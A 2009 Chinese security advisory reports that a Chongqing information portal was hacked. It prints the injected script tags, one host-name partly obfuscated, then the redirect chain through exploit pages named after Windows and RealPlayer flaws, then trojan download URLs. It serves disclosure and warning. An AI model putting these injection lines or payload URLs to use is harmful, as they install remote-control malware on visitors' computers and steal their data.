重庆人信息门户被植入恶意代码

来源:岁月联盟 编辑:zhuzhu 时间:2009-04-25
重庆人信息门户(http://movie.my023.com/)被植入恶意代码。用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。MalUrl:http://movie.my023.com/网页被嵌入恶意链接 ...重庆人信息门户(http://movie.my023.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://movie.my023.com/

网页被嵌入恶意链接代码:

090424snap8.jpg

<script  src=http://lnadk.cn></script>
<script src=http://mmc.wo94ni.%63n></script>
挂马分析:
[wide]http://movie.my023.com/
 [script]http://lnadk.cn
  [frame]http://count29.51yes.com/sa.aspx?id=294581529
  [frame]http://360.94makelove.cn/yahoo/q8.htm
   [frame]http://qq.94makelove.cn/new/index2.htm
    [frame]http://qq.94makelove.cn/new/cute.htm
     [frame]http://qq.94makelove.cn/new/yt.htm
     [frame]http://qq.94makelove.cn/new/14.htm
     [frame]http://qq.94makelove.cn/new/ms09002.htm
     [frame]http://qq.94makelove.cn/new/real.htm
     [frame]http://qq.94makelove.cn/new/real11.htm
     [script]http://qq.94makelove.cn/new/index.gif
     [frame]http://qq.94makelove.cn/new/ms08053.htm
    [script]http://s45.cnzz.com/stat.php?id=1370858&web_id=1370858
   [script]http://js.tongji.cn.yahoo.com/1061083/ystat.js
 [script]http://lnadk.cn
 [script]http://mmc.wo94ni.%63n
  [frame]http://kdx.ldc86.cn/1/01/index.htm?5
   [frame]http://kdx.ldc86.cn/1/01/index2.htm
    [frame]http://kdx.ldc86.cn/1/01/ccqm.htm
    [script]http://kdx.ldc86.cn/1/01/js.css
     [frame]http://kdx.ldc86.cn/1/01/cr14.htm
     [frame]http://kdx.ldc86.cn/1/01/crfl.htm
     [frame]http://kdx.ldc86.cn/1/01/crvod.htm
     [frame]http://kdx.ldc86.cn/1/01/crxxz.htm
     [frame]http://kdx.ldc86.cn/1/01/crff.htm
     [frame]http://kdx.ldc86.cn/1/01/crbf.htm
     [frame]http://kdx.ldc86.cn/1/01/cr122121.htm
  [frame]http://count27.51yes.com/sa.aspx?id=278116558

最终下载病毒文件:
http://3.meng3130.cn/cs/ok.css
http://w11.s8m1.com/01/Actvev.exe
http://w11.s8m1.com/01/v.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

关键字:恶意代码